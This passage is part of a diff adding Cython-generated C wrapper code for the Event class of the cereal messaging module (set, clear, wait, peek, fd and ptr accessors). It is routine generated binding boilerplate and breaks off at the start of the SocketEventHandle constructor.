*__pyx_v_self, Event __pyx_v_event) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("setEvent", 0); + + /* "cereal/messaging/messaging_pyx.pyx":62 + * + * cdef setEvent(self, cppEvent event): + * self.event = event # <<<<<<<<<<<<<< + * + * def set(self): + */ + __pyx_v_self->event = __pyx_v_event; + + /* "cereal/messaging/messaging_pyx.pyx":61 + * pass + * + * cdef setEvent(self, cppEvent event): # <<<<<<<<<<<<<< + * self.event = event + * + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":64 + * self.event = event + * + * def set(self): # <<<<<<<<<<<<<< + * self.event.set() + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_3set(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9messaging_13messaging_pyx_5Event_3set = {"set", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_3set, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_3set(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("set (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("set", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "set", 0))) return NULL; + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_5Event_2set(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_5Event_2set(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("set", 0); + + /* "cereal/messaging/messaging_pyx.pyx":65 + * + * def set(self): + * self.event.set() # <<<<<<<<<<<<<< + * + * def clear(self): + */ + __pyx_v_self->event.set(); + + /* "cereal/messaging/messaging_pyx.pyx":64 + * self.event = event + * + * def set(self): # <<<<<<<<<<<<<< + * self.event.set() + * + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":67 + * self.event.set() + * + * def clear(self): # <<<<<<<<<<<<<< + * return self.event.clear() + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_5clear(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9messaging_13messaging_pyx_5Event_5clear = {"clear", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_5clear, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_5clear(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("clear (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("clear", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "clear", 0))) return NULL; + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_5Event_4clear(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_5Event_4clear(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("clear", 0); + + /* "cereal/messaging/messaging_pyx.pyx":68 + * + * def clear(self): + * return self.event.clear() # <<<<<<<<<<<<<< + * + * def wait(self, int timeout=-1): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyInt_From_int(__pyx_v_self->event.clear()); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 68, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "cereal/messaging/messaging_pyx.pyx":67 + * self.event.set() + * + * def clear(self): # <<<<<<<<<<<<<< + * return self.event.clear() + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.Event.clear", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":70 + * return self.event.clear() + * + * def wait(self, int timeout=-1): # <<<<<<<<<<<<<< + * self.event.wait(timeout) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_7wait(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9messaging_13messaging_pyx_5Event_7wait = {"wait", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_7wait, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_7wait(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + int __pyx_v_timeout; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("wait (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_timeout,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_timeout); + if (value) { values[0] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 70, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "wait") < 0)) __PYX_ERR(0, 70, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + } + if (values[0]) { + __pyx_v_timeout = __Pyx_PyInt_As_int(values[0]); if (unlikely((__pyx_v_timeout == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 70, __pyx_L3_error) + } else { + __pyx_v_timeout = ((int)-1); + } + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("wait", 0, 0, 1, __pyx_nargs); __PYX_ERR(0, 70, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.Event.wait", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_5Event_6wait(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *)__pyx_v_self), __pyx_v_timeout); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_5Event_6wait(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *__pyx_v_self, int __pyx_v_timeout) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("wait", 0); + + /* "cereal/messaging/messaging_pyx.pyx":71 + * + * def wait(self, int timeout=-1): + * self.event.wait(timeout) # <<<<<<<<<<<<<< + * + * def peek(self): + */ + try { + __pyx_v_self->event.wait(__pyx_v_timeout); + } catch(...) { + __Pyx_CppExn2PyErr(); + __PYX_ERR(0, 71, __pyx_L1_error) + } + + /* "cereal/messaging/messaging_pyx.pyx":70 + * return self.event.clear() + * + * def wait(self, int timeout=-1): # <<<<<<<<<<<<<< + * self.event.wait(timeout) + * + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.Event.wait", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":73 + * self.event.wait(timeout) + * + * def peek(self): # <<<<<<<<<<<<<< + * return self.event.peek() + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_9peek(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9messaging_13messaging_pyx_5Event_9peek = {"peek", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_9peek, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_9peek(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("peek (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("peek", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "peek", 0))) return NULL; + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_5Event_8peek(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_5Event_8peek(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("peek", 0); + + /* "cereal/messaging/messaging_pyx.pyx":74 + * + * def peek(self): + * return self.event.peek() # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyBool_FromLong(__pyx_v_self->event.peek()); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 74, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "cereal/messaging/messaging_pyx.pyx":73 + * self.event.wait(timeout) + * + * def peek(self): # <<<<<<<<<<<<<< + * return self.event.peek() + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.Event.peek", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":76 + * return self.event.peek() + * + * @property # <<<<<<<<<<<<<< + * def fd(self): + * return self.event.fd() + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_2fd_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_2fd_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_5Event_2fd___get__(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_5Event_2fd___get__(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "cereal/messaging/messaging_pyx.pyx":78 + * @property + * def fd(self): + * return self.event.fd() # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyInt_From_int(__pyx_v_self->event.fd()); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 78, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "cereal/messaging/messaging_pyx.pyx":76 + * return self.event.peek() + * + * @property # <<<<<<<<<<<<<< + * def fd(self): + * return self.event.fd() + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.Event.fd.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":80 + * return self.event.fd() + * + * @property # <<<<<<<<<<<<<< + * def ptr(self): + * return &self.event + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_3ptr_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_3ptr_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_5Event_3ptr___get__(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_5Event_3ptr___get__(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "cereal/messaging/messaging_pyx.pyx":82 + * @property + * def ptr(self): + * return &self.event # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyInt_FromSize_t(((size_t)((void *)(&__pyx_v_self->event)))); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 82, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "cereal/messaging/messaging_pyx.pyx":80 + * return self.event.fd() + * + * @property # <<<<<<<<<<<<<< + * def ptr(self): + * return &self.event + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.Event.ptr.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_11__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9messaging_13messaging_pyx_5Event_11__reduce_cython__ = {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_11__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_11__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_5Event_10__reduce_cython__(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_5Event_10__reduce_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":2 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 2, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.Event.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_13__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9messaging_13messaging_pyx_5Event_13__setstate_cython__ = {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_13__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_13__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 3, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 3, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 3, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.Event.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_5Event_12__setstate_cython__(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_5Event_12__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":4 + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 4, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.Event.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":88 + * cdef cppSocketEventHandle * handle; + * + * def __cinit__(self, string endpoint, string identifier, bool override): # <<<<<<<<<<<<<< + * self.handle = new cppSocketEventHandle(endpoint, identifier, override) + * + */ + +/* Python wrapper */ +static int __pyx_pw_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_1__cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds); /*proto*/ +static int 